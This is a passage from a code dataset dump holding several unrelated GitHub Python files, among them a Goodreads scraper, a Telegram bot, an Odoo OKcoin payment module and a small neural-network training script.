row[0])\n","repo_name":"fbsamples/workplace-platform-samples","sub_path":"SupportScripts/Python/AddUsersToGroup/add_users_group.py","file_name":"add_users_group.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"21"} +{"seq_id":"1138446140","text":"def check(list):\n return len(set(list)) == 1\n\n\nfor _ in range(int(input())):\n n,k=map(int,input().split())\n list1=[int(i) for i in input().split()]\n count=0\n for i in range(n//2):\n if list1[i]!=list1[n-1-i]:\n count+=1\n if n%2!=0 :\n if n>3:\n if list1[n//2]==list1[n//2 -1]==list1[n//2 +1]:\n count+=1\n elif n%2==0:\n count-=1\n if check(list1):\n print(0)\n else:\n print(count)","repo_name":"programophile/Codeforces-Problems","sub_path":"Vika and the bridge.py","file_name":"Vika and the bridge.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25962121220","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Using Bool Parameter to limit the number of pages\nbool_param = True\n\n##get start time for calculation scraping time \nstart_time = time.time()\n\n# Create an instance of requests.Session for efficient network requests\nsession = requests.Session()\n\n# Collect pagination links\nurl = 'https://www.goodreads.com/list/show/22031.Nonfiction_With_a_Side_of_Self_Help?page=1'\nresponse = session.get(url)\nsoup = 
BeautifulSoup(response.content, 'html.parser')\n\n\n# Extract pagination links for the first 10 pages\n\npagination_links = soup.select('div.pagination a')\npagination_df = pd.DataFrame(columns=['page', 'link'])\npagination_df = pd.concat([pagination_df, pd.DataFrame({'page': [1], 'link': [url]})], ignore_index=True)\n\nfor link in pagination_links:\n    page = link.text.strip()\n    link_url = 'https://www.goodreads.com' + link['href']\n    if len(page) <= 2:\n        pagination_df = pd.concat([pagination_df, pd.DataFrame({'page': [page], 'link': [link_url]})], ignore_index=True)\n\n# save the pagination links to a CSV file for later use\npagination_df.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\pagination_links.csv', index=False)\n\n# Collect book links\n\n# First read the pagination links file to get book links\npagination_df = pd.read_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\pagination_links.csv')\nbook_links = pd.DataFrame(columns=['link'])\n\ndef extract_book_links(page):\n    response = session.get(page)\n    soup = BeautifulSoup(response.content, 'html.parser')\n    print(\"Pagination\", page)\n\n    links = soup.select('a.bookTitle')\n    book_links = []\n    for link in links:\n        book_link = 'https://www.goodreads.com' + link['href']\n        book_links.append(book_link)\n    return book_links\n\n# Use ThreadPoolExecutor to extract book links in parallel, which helps reduce scraping time\n\nwith ThreadPoolExecutor() as executor:\n    results = executor.map(extract_book_links, pagination_df['link'])\n    for result in results:\n        book_links = pd.concat([book_links, pd.DataFrame({'link': result})], ignore_index=True)\n\n# Save book links to a CSV file for further use\nbook_links.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_links.csv', index=False)\n\n# Collect book details\n\n### first read book_links.csv to get the book links\nbook_links = pd.read_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_links.csv')\nif bool_param:\n    book_links = book_links[1:101]\n\nbooks = pd.DataFrame(columns=[\"link\", \"title\", \"author_name\", \"author_link\", \"kindle_price\",\n                              \"average_rating\", \"rating_count\", \"review_count\", \"n_pages\"])\n\n### retry the GET request until a successful response is obtained, to handle transient request failures\n\ndef parse_book_details(url):\n    response = None\n    while response is None:\n        try:\n            response = session.get(url)\n        except requests.exceptions.RequestException:\n            print(f\"Request failed for {url}. 
Retrying...\")\n time.sleep(1)\n\n## 1 second delay is added before parsing to ensure proper server \n soup = BeautifulSoup(response.content, 'html.parser')\n time.sleep(1)\n \n ##extract book details from the page \n ###The try-except blocks are added to handle potential errors or exceptions that \n # may occur during the extraction of specific book details from the parsed HTML content.\n\n try:\n title_element = soup.find('h1', attrs={'data-testid': 'bookTitle'})\n title = title_element.text.strip() if title_element else ''\n except:\n title = ''\n \n try:\n author_name_element = soup.find('span', class_='ContributorLink__name')\n author_name = author_name_element.text.strip() if author_name_element else ''\n except:\n author_name = ''\n \n try:\n author_link_element = soup.find('a', class_='ContributorLink')\n author_link = author_link_element['href'] if author_link_element else ''\n except:\n author_link = ''\n \n try:\n kindle_price_element = soup.find('span', class_='Button__labelItem', text=re.compile(r'Kindle'))\n kindle_price = kindle_price_element.text.strip() if kindle_price_element else ''\n except:\n kindle_price = ''\n\n \n try:\n average_rating_element = soup.find('div', class_='RatingStatistics__column')\n average_rating = average_rating_element.text.strip() if average_rating_element else ''\n except:\n average_rating = ''\n \n try:\n rating_count_element = soup.find('div', class_='BookPageMetadataSection__ratingStats').find('span', {'data-testid': 'ratingsCount'})\n rating_count = rating_count_element.text.strip() if rating_count_element else ''\n except:\n rating_count = ''\n \n try:\n review_count_element = soup.find('div', class_='BookPageMetadataSection__ratingStats').find('span', {'data-testid': 'reviewsCount'})\n review_count = review_count_element.text.strip() if review_count_element else ''\n except:\n review_count = ''\n \n try:\n pages_element = soup.find('p', attrs={'data-testid': 'pagesFormat'})\n n_pages = pages_element.text.strip() if pages_element else ''\n except:\n n_pages = ''\n \n details = pd.DataFrame({\"link\": [url], \"title\": [title], \"author_name\": [author_name],\n \"author_link\": [author_link], \"kindle_price\": [kindle_price],\n \"average_rating\": [average_rating], \"rating_count\": [rating_count],\n \"review_count\": [review_count], \"n_pages\": [n_pages]})\n\n return details\n\n\ndef scrape_book_details(link):\n details = parse_book_details(link)\n\n while details['title'].values[0] == '':\n print(f\"Title not found for {link}. 
Retrying...\")\n details = parse_book_details(link)\n\n return details\n\n# Use ThreadPoolExecutor to scrape book details in parallel\n\nwith ThreadPoolExecutor() as executor:\n results = executor.map(scrape_book_details, book_links['link'])\n for result in results:\n books = pd.concat([books, result], ignore_index=False)\n print(\"Book\", result['link'].values[0])\n\n# Final data manipulation\npattern = r'[^0-9,]'\nbooks['rating_count'] = books['rating_count'].apply(lambda x: re.sub(pattern, '', x))\nbooks['review_count'] = books['review_count'].apply(lambda x: re.sub(pattern, '', x))\n\n# Save book details to a CSV file\nbooks.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_details.csv', index=False)\n\n#get the end time and calculate scraping time in Seconds\nend_time = time.time()\ntotal_time = end_time - start_time\nprint(\"Scraping time:\", total_time, \"seconds\")\n","repo_name":"huseyinpolat-ds/WS_2023_project","sub_path":"soup/bs.py","file_name":"bs.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35967027463","text":"import string\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\n\ndef clean(text):\n for punctuation in string.punctuation:\n text = text.replace(punctuation, ' ') # Remove Punctuation\n lowercased = text.lower() # Lower Case\n tokenized = word_tokenize(lowercased) # Tokenize\n words_only = [word for word in tokenized if word.isalpha()\n ] # Remove numbers\n stop_words = set(stopwords.words('english')) # Make stopword list\n # Remove Stop Words\n without_stopwords = [word for word in words_only if not word in stop_words]\n lemma = WordNetLemmatizer() # Initiate Lemmatizer\n lemmatized = [lemma.lemmatize(word)\n for word in without_stopwords] # Lemmatize\n return lemmatized\n\n\n# data['clean_text'] = data.text.apply(clean)\n# data['clean_text'] = data['clean_text'].astype('str')\n\n","repo_name":"DataASG/Fake_news","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11173074022","text":"## Santosh Khadka - Tic Tac Toe Game \n\n#Globals\nrow1 = ['-', '-', '-']\nrow2 = ['-', '-', '-']\nrow3 = ['-', '-', '-']\n\ndef print_start():\n print(\"===============================\")\n print(' Lets play Tic-Tac-Toe!')\n print(\"===============================\")\n print(\"[Type 'exit' to leave anytime.]\")\n print()\n x = 0\n while x == 0:\n choice = input(\"Would you like to be X or O?\")\n if (choice == 'x') or (choice == 'X') or (choice == 'o') or (choice == 'O'):\n print()\n return choice.upper()\n else:\n print('Invalid input try again..')\n \n\ndef print_board(r1, r2, r3):\n #h_bar = ' -----------'\n h_bar = ' #############'\n h_bar = ' -------------'\n print(' 1 2 3')\n print(h_bar)\n print('A: |',r1[0],'|',r1[1],'|',r1[2],'|')\n print(h_bar)\n print('B: |',r2[0],'|',r2[1],'|',r2[2],'|')\n print(h_bar)\n print('C: |',r3[0],'|',r3[1],'|',r3[2],'|')\n print(h_bar)\n print()\n \ndef get_input():\n #location = input(\"Input column letter then row number (i.e. c1): \")\n colRow = [0,0]\n x = 0\n while x == 0:\n print(\"Pick a location to add your piece...\")\n location = input(\"Input column letter then row number (i.e. 
c1): \")\n if str(location).lower() == \"exit\":\n quit()\n #print(location[0])\n #print(location[1])\n if ((str(location[0]).lower() == 'a') or (str(location[0]).lower() =='b') or (str(location[0]).lower() =='c')) and ((location[1] == '1') or (location[1] == '2') or (location[1] == '3')):\n break\n else:\n print(\"Invalid input, try again...\")\n \n column = str(location[0].lower())\n if column == 'a':\n column = 1\n elif column == 'b':\n column = 2\n elif column == 'c':\n column = 3 \n row = int(location[1])\n colRow[0] = column\n colRow[1] = row\n return colRow\n\ndef replace_board(col, row, choice):\n global row1\n global row2\n global row3\n # if row == 1:\n # row1[col] = \n # elif row == 2:\n # elif row == 3:\ndef reset_board():\n global row1\n global row2\n global row3\n \n row1 = ['-', '-', '-']\n row2 = ['-', '-', '-']\n row3 = ['-', '-', '-']\n\ndef end_game(winner):\n if winner != 'computer':\n print(\"Congratulations you WON!\")\n else:\n print(\"Better luck next time!\")\n \n choice = input(\"Make your next choice:\")\n if choice == 1:\n print(\"Ok, lets play again!\")\n reset_board()\n return(print_start())\n elif choice == 2:\n print(\"Thanks for playing, bye!\")\n quit()\n \n \n\ndef main():\n global row1\n global row2\n global row3\n \n x = 0\n piece = print_start()\n #print_start()\n \n while x == 0:\n print_board(row1, row2, row3) \n print(get_input())\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"skhadka007/learning_algos","sub_path":"Learning-python/Section 7 - Milestone Project 1/tictactoe_v1.py","file_name":"tictactoe_v1.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10357011586","text":"from models.func_2 import change_photo_2\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram import types\nfrom aiogram.types import ContentType\nfrom aiogram.types.input_media import InputFile\nfrom creat_bot import bot\n\nstart_buttons = [\"Информация о боте\", \"Загрузить фото\"]\n\n\nasync def cmd_start(message: types.Message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True, input_field_placeholder='Нажмите на кнопку ☟')\n # клавиатура при старте\n name_user = message.from_user.first_name # получаем имя пользователя\n keyboard.add(*start_buttons)\n await message.answer(f\"Привет🙋, {name_user}!\\nЯ бот. 
\nasync def cmd_start(message: types.Message):\n    keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True, input_field_placeholder='Press a button ☟')\n    # start-menu keyboard\n    name_user = message.from_user.first_name  # get the user's first name\n    keyboard.add(*start_buttons)\n    await message.answer(f\"Hi🙋, {name_user}!\\nI am a bot. The commands I can run are listed below\\n\",\n                         reply_markup=keyboard)\n    # reply to the user after /start\n\n\nasync def cmd_download(message: types.Message):\n    name_user = message.from_user.first_name\n    await message.answer(f\"{name_user}, send me a photo with people in it; I will process it and send it back\")\n\n\nasync def cmd_media(message: types.Message):\n    name_user = message.from_user.first_name\n    file_id = message.photo[-1].file_id\n    file = await bot.get_file(file_id)\n    file_path = file.file_path\n    image_name = f\"{file_id}.jpg\"\n    await bot.download_file(file_path=file_path, destination=f\"models/download_photo/{image_name}\", timeout=1)\n    change_photo_2(image_name=image_name)\n    await message.answer(text=\"Photo received\")\n    photo = InputFile(f\"models/save_photo/out{image_name}\")\n    await message.answer_photo(photo=photo)\n\n\n# reply to all unrecognized messages\nasync def cmd_answer_all(message: types.Message):\n    await message.answer('Unknown command.\\nPlease use the /start command')\n\n\ndef register_handlers_users(dp: Dispatcher):\n    dp.register_message_handler(cmd_start, commands='start')\n    dp.register_message_handler(cmd_download, commands='download')\n    dp.register_message_handler(cmd_download, Text(equals=start_buttons[1], ignore_case=True))\n    dp.register_message_handler(cmd_media, content_types=ContentType.PHOTO)\n    dp.register_message_handler(cmd_answer_all)\n","repo_name":"Nikc-mk/ODS_ML_SD","sub_path":"handlers/main_handlers.py","file_name":"main_handlers.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33297748448","text":" # -*- coding: utf-8 -*-\nfrom odoo import _, fields, models\nfrom odoo.exceptions import UserError\nimport requests, logging, json, datetime, hmac, base64\nimport numpy as np\n_logger = logging.getLogger(__name__)\n\n\nclass OKcoinInstance(models.Model):\n    _name = 'okcoin.instance'\n    _description = 'OKcoin V5 Instance'\n\n    name = fields.Char(string='Name')\n    server_url = fields.Char(string='Server URL')\n    api_key = fields.Char(string='API Key')\n    secret_key = fields.Char(string='Secret Key')\n    pass_phrase = fields.Char(string='Password')\n    maker_taker = fields.Selection([('taker', 'Taker'), ('maker', 'Maker')])\n    convert_percent = fields.Integer()\n    state = fields.Selection(\n        [(\"draft\", \"Not Confirmed\"), (\"active\", \"Active\"), (\"inactive\", \"Inactive\")],\n        default=\"draft\",\n        string=\"State\",\n    )\n\n\n    def get_okcoin_timestamp(self):\n        timestamp = datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + \"Z\"\n        print(timestamp)\n        return timestamp\n\n    def get_signature(self, t, method, request_path, body=None):\n        if str(body) == '{}' or str(body) == 'None' or body is None:\n            body = ''\n        message = str(t) + str.upper(method) + request_path + str(body)\n        mac = hmac.new(bytes(self.secret_key, encoding='utf8'), bytes(message, encoding='utf-8'), digestmod='sha256')\n        d = mac.digest()\n        return base64.b64encode(d)\n\n    def get_header(self, sig, t):\n        CONTENT_TYPE = 'Content-Type'\n        OK_ACCESS_KEY = 'OK-ACCESS-KEY'\n        OK_ACCESS_SIGN = 'OK-ACCESS-SIGN'\n        OK_ACCESS_TIMESTAMP = 'OK-ACCESS-TIMESTAMP'\n        OK_ACCESS_PASSPHRASE = 'OK-ACCESS-PASSPHRASE'\n        APPLICATION_JSON = 'application/json'\n        GET = 'GET'\n        POST = 'POST'\n        header = dict()\n        header[CONTENT_TYPE] = APPLICATION_JSON\n        header[OK_ACCESS_KEY] = self.api_key\n        header[OK_ACCESS_SIGN] = sig\n        header[OK_ACCESS_TIMESTAMP] = t\n        header[OK_ACCESS_PASSPHRASE] = self.pass_phrase\n        return header\n
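\n    # v5 auth: the signature is base64(HMAC-SHA256(secret_key, timestamp + METHOD + request_path + body)),\n    # e.g. signing the prehash \"2023-01-01T00:00:00.000ZGET/api/v5/account/balance\" (see get_signature above)\n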
    def parse_params_to_str(self, params):\n        url = '?'\n        for key, value in params.items():\n            url = url + str(key) + '=' + str(value) + '&'\n        return url[0:-1]\n\n    def query(self, type, request_path, body=''):\n        if type == \"POST\":\n            body = json.dumps(body)\n            print(body)\n        else:\n            if body != '':\n                body = self.parse_params_to_str(body)\n        timestamp = self.get_okcoin_timestamp()\n        print(body)\n        signature = self.get_signature(timestamp, type, request_path, body)\n        header = self.get_header(signature, timestamp)\n        if type == 'GET':\n            response = requests.get(self.server_url + request_path + body, headers=header)\n        else:\n            print(self.server_url + request_path)\n            response = requests.post(self.server_url + request_path, data=body, headers=header)\n        return response\n\n    def test_okcoin_connection(self):\n        try:\n            request_path = '/api/v5/account/balance'\n            body = ''\n            response = self.query('GET', request_path, body)\n            is_success = response.status_code == 200\n            return is_success\n        except Exception as e:\n            raise UserError(_(\"Test Connection Error: %s\", e.args))\n\n    def action_test_connection(self):\n        is_success = self.test_okcoin_connection()\n        type = (\n            \"success\"\n            if is_success\n            else \"danger\"\n        )\n        messages = (\n            \"Everything seems properly set up!\"\n            if is_success\n            else \"Server credential is wrong. Please check credential.\"\n        )\n        title = _(\"Connection Testing\")\n\n        return {\n            \"type\": \"ir.actions.client\",\n            \"tag\": \"display_notification\",\n            \"params\": {\n                \"title\": title,\n                \"message\": messages,\n                \"sticky\": False,\n                \"type\": type\n            },\n        }\n\n    def action_activate(self):\n        is_success = self.test_okcoin_connection()\n        if is_success:\n            # Get Conversion Rate\n            #self.conversion_rate = self.action_get_conversion_rate_source()\n            self.state = 'active'\n            # Auto create Account Journal and POS Payment Method at the first Activate\n            journal = self.env['account.journal'].search(\n                [(\"use_okcoin_server\", \"=\", True), (\"type\", \"=\", \"bank\"), ('company_id', '=', self.env.company.id)],\n                limit=1)\n            if not journal:\n                journal = self.env['account.journal'].search(\n                    [(\"type\", \"=\", \"bank\"), ('company_id', '=', self.env.company.id)], limit=1)\n                new_okcoin_server_journal = journal.copy()\n                new_okcoin_server_journal.write({\n                    'name': 'OKcoin Server',\n                    'use_okcoin_server': True,\n                    'code': 'OKcoin',\n                    'okcoin_server_instance_id': self.id\n                })\n                new_okcoin_server_pos_payment_method = self.env['pos.payment.method'].create({\n                    'name': 'OKcoin Server',\n                    'company_id': self.env.company.id,\n                    'journal_id': new_okcoin_server_journal.id\n                }\n                )\n                new_okcoin_server_pos_payment_method = self.env['pos.payment.method'].create({\n                    'name': 'OKcoin Server (Lightning)',\n                    'company_id': self.env.company.id,\n                    'journal_id': new_okcoin_server_journal.id\n                }\n                )\n\n    def action_deactivate(self):\n        self.state = 'inactive'\n\n\n    def action_create_invoice_lightning(self, pos_payment_obj):  # creates lightning invoice\n        try:\n            invoiced_info = self.get_amount_sats(pos_payment_obj)  # gets the invoiced satoshi amount and conversion rate from get_amount_sats function\n            amount_btc = invoiced_info['invoiced_sat_amount']/100000000  # converts sats to BTC as required by the deposit endpoint\n            formatted_amount_btc = np.format_float_positional(amount_btc, trim='-')\n            request_path = '/api/v5/asset/deposit-lightning?ccy=BTC&amt=' + str(formatted_amount_btc) + '&to=18'\n            body = ''\n            type = \"GET\"\n            response = self.query(type, request_path, body)\n
            response_json = response.json()\n            result = response_json.get('data')[0] if response.status_code == 200 else None\n            result.update(invoiced_info)  # attach invoiced info (sat amount and conversion rate) to the API response\n            return result  # returns merged results\n        except Exception as e:\n            _logger.info(\" lightning invoice exception\")\n            raise UserError(_(\"Create OKcoin Lightning Invoice: %s\", e.args))\n\n\n    def action_get_conversion_rate(self):  # obtains conversion rate from OKcoin server\n        _logger.info('called get conversion rate')\n        try:\n            request_path = '/api/v5/market/ticker?instId=BTC-USD'\n            body = ''\n            type = \"GET\"\n            response = self.query(type, request_path, body)\n            response_json = response.json()\n            result = response_json.get('data')[0].get('last') if response.status_code == 200 else None\n            return result\n        except Exception as e:\n            _logger.info(\"conversion rate exception\")\n            raise UserError(_(\"Get Conversion Rate: %s\", e.args))\n\n    def get_amount_sats(self, pos_payment_obj):  # obtains the amount of satoshis to invoice by calling action_get_conversion_rate and doing the math, returns a dict with both values\n        try:\n            okcoin_conversion_rate = self.action_get_conversion_rate()\n            amount_sats = round((float(pos_payment_obj.get('amount')) / float(okcoin_conversion_rate)) * 100000000, 0)  # conversion to satoshis, rounded to a whole satoshi\n            invoiced_info = {'conversion_rate': okcoin_conversion_rate,\n                             'invoiced_sat_amount': amount_sats\n                             }\n            return invoiced_info  # return dictionary with results of both functions\n        except Exception as e:\n            _logger.info(\"amount sats exception\")\n            raise UserError(_(\"Get Sat Amount: %s\", e.args))\n\n\n    def action_check_lightning_invoice(self, lightning_invoice_id):  # checks status of lightning invoices, only\n        try:\n            request_path = '/api/v5/asset/deposit-history?ccy=BTC'  # + lightning_invoice_id\n            body = ''\n            type = \"GET\"\n            response = self.query(type, request_path, body)\n            response_json = response.json()\n            results = response_json.get('data') if response.status_code == 200 else None\n            for result in results:\n                if result.get('to') == lightning_invoice_id:\n                    return result\n            return {'state':'-1'}\n        except Exception as e:\n            raise UserError(_(\"Check OKcoin Lightning Invoice %s: %s\", lightning_invoice_id, e.args))\n\n\n    def action_sell(self, pos_payment_obj):  # sells a configured percentage of the invoiced amount at market price\n        try:\n            invoiced_sat_amount = pos_payment_obj.get('invoiced_sat_amount')\n            convert_percent = self.convert_percent\n            _logger.info(invoiced_sat_amount)\n            # BTC to sell = (invoiced sats expressed as BTC) * (percent to convert)\n            conversion_sat_amount = (invoiced_sat_amount/100000000)*(convert_percent/100)\n            _logger.info(conversion_sat_amount)\n            request_path = '/api/v5/trade/order'\n            body = {\n                \"instId\":\"BTC-USD\",\n                \"tdMode\":\"cash\",\n                \"clOrdId\":\"test\",\n                \"side\":\"sell\",\n                \"ordType\":\"market\",\n                \"sz\":str(conversion_sat_amount)}  # minimum - 0.0001\n            type = \"POST\"\n            _logger.info(body)\n            response = self.query(type, request_path, body)\n            response_json = response.json()\n            _logger.info(response_json)\n            result = response_json.get('data')[0] if response.status_code == 200 else None\n            _logger.info(result)\n            if result.get('clOrdId') == \"test\":\n                if result.get('sCode') == \"0\":\n                    _logger.info(result)\n                    return result\n                else:\n                    result = {'sCode': '-1', 'clOrdId': 'test'}\n                    _logger.info(result)\n                    return result\n        except Exception as e:\n            _logger.info(\"sale order exception\")\n            raise UserError(_(\"OKcoin Sell Order: %s\", e.args))
","repo_name":"ERP-FTW/mlr_pos_exchanger","sub_path":"models/okcoin_instance.py","file_name":"okcoin_instance.py","file_ext":"py","file_size_in_byte":10708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4546062651","text":"#!/usr/bin/env python\n# coding: utf-8\n#########################################################################\n#Name:codeMain.py \n#BY yu \n#Description: Open \n# \n######################################################################### \nimport web\nimport os\nimport userApi\nimport pymongo\nimport MongodbApi\nimport ArticleApi\nimport SectionApi\n#import dbMongoApi\n#import sys \n#default_encoding = 'utf-8' \n#if sys.getdefaultencoding() != default_encoding: \n#     reload(sys) \n#     sys.setdefaultencoding(default_encoding)\nClient=pymongo.MongoClient('localhost',27017)\nconn=Client.afterWard\n#web.config.debug = False\nurls = (\n    '/','index',\n    '/mars/signup', 'userApi.signUp',\n    '/mars/signin', 'userApi.signIn',\n    '/mars/signout','userApi.signOut',\n    '/mars/datebase','MongodbApi.mongoDate',\n    '/mars/article/(.+)','ArticleApi.Articles',\n    '/mars/section' , 'SectionApi.Sections',\n    \"/set\", \"CookieSet\",\n    \"/get\", \"CookieGet\",\n    \"/session\",\"sessions\",\n    \"/mars\",\"index\",\n    \"/mars/user\",\"userApi.userData\"\n)\napp_root = os.path.dirname(__file__)\ntemplates_root = os.path.join(app_root,'temp')\nrender = web.template.render(templates_root)\nclass CookieSet:\n    def GET(self):\n        web.setcookie(\"age\", \"23\", 10)\n        return \"Your cookie is created\"\n\nclass CookieGet:\n    def GET(self):\n        try:\n            return \"Your age is : \" + web.cookies().age\n        except Exception:\n            return \"Your cookie doesn't exist\"\nclass index:\n    def __init__(self):\n        self.app_root = os.path.dirname(__file__)\n        self.templates_root = os.path.join(self.app_root,'temp')\n        self.render = web.template.render(self.templates_root)\n    def GET(self):\n        return self.render.test1()\n    def POST(self):\n        dic=web.input()\n        #dic.pop(\"action\")\n        \n        return dic\nclass sessions:\n    def __init__(self):\n        self.app_root = os.path.dirname(__file__)\n        self.templates_root = os.path.join(self.app_root,'temp')\n        self.render = web.template.render(self.templates_root)\n    def GET(self):\n        return web.config._session.logIn\n\n#    session = web.session.Session(app, web.session.DiskStore('sessions'))\n    \n#    web.wsgi.runwsgi = lambda func, addr=None: web.wsgi.runfcgi(func, addr)\n#    def session_hook():\n#        web.ctx.session = session\n#    app.add_processor(web.loadhook(session_hook))##print web.ctx.session.xxx\napp = web.application(urls, globals())\nif web.config.get('_session') is None:\n    session = web.session.Session(app, web.session.DiskStore('sessions'),initializer={'logIn':'False','userName':None})\n    web.config._session = session\nelse:\n    session = web.config._session\nif __name__ == \"__main__\":\n    \n    app.run()\n    ","repo_name":"Icafe8/afterWard","sub_path":"codeMain.py","file_name":"codeMain.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6969233482","text":"from theblockchainapi import BlockchainAPIResource, Blockchain, BlockchainNetwork\nimport json\n\n# Get an API key pair for free here: https://dashboard.blockchainapi.com/api-keys\nMY_API_KEY_ID = None\nMY_API_SECRET_KEY = None\n\nBLOCKCHAIN = Blockchain.SOLANA\nNETWORK = BlockchainNetwork.SolanaNetwork.MAINNET_BETA\n# NETWORK = BlockchainNetwork.SolanaNetwork.DEVNET\n\n# BLOCKCHAIN = Blockchain.ETHEREUM\n
# NETWORK = BlockchainNetwork.EthereumNetwork.MAINNET\n# NETWORK = BlockchainNetwork.EthereumNetwork.ROPSTEN\n\nBLOCKCHAIN_API_RESOURCE = BlockchainAPIResource(\n    api_key_id=MY_API_KEY_ID,\n    api_secret_key=MY_API_SECRET_KEY,\n    blockchain=BLOCKCHAIN,\n    network=NETWORK\n)\n\n\ndef example():\n    try:\n        assert MY_API_KEY_ID is not None\n        assert MY_API_SECRET_KEY is not None\n    except AssertionError:\n        raise Exception(\"Fill in your key ID pair!\")\n\n    rpc_url = BLOCKCHAIN_API_RESOURCE.get_rpc_url()\n\n    print(\n        f\"You can use this RPC URL for `{BLOCKCHAIN.value}`, `{NETWORK.value}`; \"\n        f\"but make sure to include your API keys in the headers. \\n\\n {rpc_url}\"\n    )\n\n    rpc_response = BLOCKCHAIN_API_RESOURCE.make_rpc_request(\n        method='getBlockTime',\n        params=[\n            135659086\n        ]\n    )\n\n    # In progress....\n    print(rpc_response)\n    print(json.dumps(rpc_response, indent=4))\n\n\nif __name__ == '__main__':\n    example()\n","repo_name":"BL0CK-X/blockchain-api","sub_path":"examples/rpcs/call-rpc/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"}
{"seq_id":"13338279403","text":"import simpleNN\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\n\r\ndef trainNetworks():\r\n    maxIter = 100 #DEFAULT\r\n    lmbd = [0, 0.2, 0.5, 0.7, 1] #DEFAULT\r\n    alpha = [0.1, 0.5, 1, 2] #DEFAULT\r\n    pairs = ()\r\n    for alphaValue in alpha:\r\n        for lambdaValue in lmbd:\r\n            pairs = pairs + ((alphaValue, lambdaValue),)\r\n    print(pairs)\r\n\r\n\r\n    Theta1 = np.zeros((20, 170, 25))\r\n    Theta2 = np.zeros((20, 26, 10))\r\n    Theta3 = np.zeros((20, 11, 1))\r\n    # Theta1 = np.load('metaAnalysisTheta1.npy')\r\n    # Theta2 = np.load('metaAnalysisTheta2.npy')\r\n    # Theta3 = np.load('metaAnalysisTheta3.npy')\r\n\r\n\r\n    #costHistory = np.load('costHistory.npy')\r\n    costHistory = np.zeros((20, 100))  # zeros (not np.empty) so the check below counts real gaps\r\n    print('Examples without recorded history:',np.sum(costHistory[0, :] == 0))\r\n    finalCost = np.zeros(20)\r\n\r\n\r\n    for count in range(0,20):\r\n        alphaValue = pairs[count][0]\r\n        lambdaValue = pairs[count][1]  \r\n        print('Training Network with Alpha = {0}, Lambda = {1}'.format(alphaValue, lambdaValue))\r\n        (Theta1[count], Theta2[count], Theta3[count], costHistory[count]) = simpleNN.main(\r\n            'y training', maxIter, lambdaValue, alphaValue)\r\n\r\n        finalCost[count] = costHistory[count][-1]\r\n        \r\n\r\n    #This line saves all theta values as a 3 dimensional array for later access.\r\n    np.save(\"metaAnalysisTheta1.npy\", np.array(Theta1))\r\n    np.save(\"metaAnalysisTheta2.npy\", np.array(Theta2))\r\n    np.save(\"metaAnalysisTheta3.npy\", np.array(Theta3))\r\n    np.save('costHistory.npy', costHistory)\r\n\r\n    print('Saved. 
Iteration', str(count) + '.')\r\n\r\n\r\n\r\n\r\ndef CVTest():\r\n '''CV Test\r\n This function is built to use the various networks trained by the trainNetworks, or with some \r\n minor modification any trained network with the normal interface, and test each against the CV \r\n data set for comparison and evaluation purposes of various settings when training the networks.\r\n '''\r\n \r\n #These 3D vectors are, usually, each collections of 20 2D theta value matrices.\r\n Theta1 = np.load('metaAnalysisTheta1.npy')\r\n Theta2 = np.load('metaAnalysisTheta2.npy')\r\n Theta3 = np.load('metaAnalysisTheta3.npy')\r\n\r\n (X, Y) = simpleNN.loadNewData('CV')\r\n #X = np.load('XCV.npy')\r\n #Y = np.load('YCV.npy')\r\n m = np.size(X, 0)\r\n\r\n finalCosts = np.empty(20)\r\n F1 = np.empty(20)\r\n for i in range(0, 20):\r\n prediction = simpleNN.forwardProp(X, Theta1[i], Theta2[i], Theta3[i])\r\n print('predict[0:5]:', prediction[:5])\r\n\r\n correctError = np.multiply(-Y, np.log(prediction))\r\n incorrectError = np.multiply(1 - Y, np.log(1 - prediction))\r\n J = correctError - incorrectError\r\n J = np.sum(J)\r\n finalCosts[i] = J / m #the final cost, without regularization\r\n \r\n prediction = np.array(prediction > 0.5, dtype=int)\r\n truePos = np.sum( np.logical_and( prediction == 1, Y == 